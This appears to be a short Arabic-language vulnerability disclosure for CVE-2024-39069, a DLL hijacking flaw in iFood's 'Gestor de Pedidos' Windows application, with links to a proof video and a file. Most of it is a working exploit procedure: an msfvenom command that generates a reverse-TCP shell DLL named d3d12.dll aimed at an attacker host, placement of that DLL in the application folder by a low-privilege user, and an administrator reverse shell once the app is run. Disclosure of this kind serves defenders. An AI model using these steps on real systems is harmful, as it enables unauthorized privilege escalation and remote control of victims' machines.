
CVE-2024-39069
يضع المهاجم ملف DLL ضار باسم "d3d12.dll" في دليل يتم البحث فيه بواسطة التطبيق قبل العثور على الملف "d3d12.dll" الشرعي. عند تشغيل التطبيق، يتم تحميل ملف DLL الضار بدلاً من الشرعي، مما يسمح للمهاجم بتنفيذ تعليمات برمجية عشوائية في سياق التطبيق.
الصفحة الرئيسية للبائع: https://gestordepedidos.ifood.com.br/
جوجل درايف: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing
فيديو الإثبات: https://youtu.be/oMIobV2M0T8
إنشاء ملف dll ضار على كالي لينكس باستخدام msfvenom
msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
نقل الملف 'd3d12.dll' الذي تم إنشاؤه إلى مضيف ويندوز من كالي مع وصول مستخدم منخفض المستوى
نقل ملف 'd3d12.dll' الذي تم إنشاؤه إلى المسار 'C:\Gestor de Peddios\d3d12.dll' مع وصول مستخدم منخفض المستوى
عند تشغيل المسؤول للتطبيق، ستحصل على وصول عكسي كمسؤول